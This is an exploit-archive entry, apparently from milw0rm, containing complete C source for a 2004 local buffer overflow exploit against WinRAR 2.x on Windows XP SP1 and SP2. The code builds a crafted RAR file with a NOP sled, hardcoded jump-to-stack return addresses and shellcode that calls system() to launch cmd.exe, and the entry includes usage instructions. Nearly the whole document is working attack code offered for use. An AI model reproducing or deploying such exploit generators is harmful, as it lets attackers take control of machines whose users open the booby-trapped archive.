WinRAR 1.0 - Local Buffer Overflow

EKU-ID: 8738	CVE: OSVDB-18942	OSVDB-ID:
Author: ATmaCA	Published: 2004-09-28	Verified:
Download:
Rating

☆☆☆☆☆
/*
* WinRar local buffer overflow exploit V1.0
* Coded By ATmaCA
* Copyright © 2004 ProGroup Software, Inc.
* E-Mail:atmaca@prohack.net
* Web:www.prohack.net
* Usage:\r\nexploit <Target> <OutputPath>
* Targets:
* 1 - WinXP SP1 user32.dll [0x77D718FC]
* 2 - WinXP SP2 user32.dll [0x77D8AF0A]
* Example:exploit 1 myrar.rar
*/

/*
* All WinRar 2.x series are effected
* 3.x series not effected
* If you want to test and you do not have WinRar V2.x
* You can download it from http://atmaca.prorat.net/Src/winrar.zip
*/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>

#ifdef __BORLANDC__
       #include <mem.h>
#endif

#define NOP 0x90

/*crafted rar header*/
char winrar_header[] =
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00\x00"
"\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x02\x00\x00\x00\x00\x12";

/*launch a local cmd.exe*/
char shellcode[]=
"\x68"                    // push
"cmd "                    // cmd
"\x8B\xC4"                // mov eax,esp
"\x50"                    // push eax
"\xB8\xc7\x93\xC2\x77"    // mov eax,77C293C7 (address of system() on WinXP SP2
- msvcrt.dll)
"\xFF\xD0"                // call eax
;

char *target[]=  //return addr
{
       "\xFC\x18\xD7\x77",   //User32 jmp esp addr  WinXp Sp1
       "\x0A\xAF\xD8\x77"    //User32 jmp esp addr  WinXp Sp2
};

char *sysadrr[]=
{
       "\x44\x80\xC2\x77",   //77C28044 XP Sp1  msvcrt.dll system()
       "\xC7\x93\xC2\x77"    //77C293C7 XP Sp2  msvcrt.dll system()
};

FILE   *di;
int    targetnum;
int    i;

void main(int argc, char *argv[])
{

       if (argc < 3)
       {
                printf("\r\nWinRar local buffer overflow exploit V1.0\r\n",
argv[0]);
                printf("Coded By ATmaCA\r\n");
                printf("Copyright © 2004 ProGroup Software, Inc.\r\n");
                printf("E-Mail:atmaca@prohack.net\r\n");
                printf("Web:www.prohack.net\r\n\r\n");
                printf("Usage:\r\nexploit <Target>
<OutputPath>\r\n\r\n",argv[0]);
                printf("Targets:\n");
                printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");
                printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");
                printf("Example:exploit 1 myrar.rar\n");

                return;
       }

       targetnum = atoi(argv[1]) - 1;

       if( (di=fopen(argv[2],"wb")) == NULL )
       {
               printf("Error opening file!\n");
               return;
       }
       for(i=0;i<sizeof(winrar_header)-1;i++)
               fputc(winrar_header[i],di);

       /*stuff in a couple of NOPs*/
       for(i=0;i<1051;i++)
               fputc(NOP,di);

       fprintf(di,"%s",target[targetnum]); //EIP

       for(i=0;i<50;i++) //NOPs
               fputc(NOP,di);

       memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr

       /*Overwriting the return address (EIP) with JMP ESP address
       located somewhere in process space */
       for(i=0;i<sizeof(shellcode)-1;i++)
               fputc(shellcode[i],di);

       for(i=0;i<50;i++) //NOPs
               fputc(NOP,di);

       printf("Exploit rar file %s has been generated!\n",argv[2]);

       fclose(di);
}

// milw0rm.com [2004-09-28]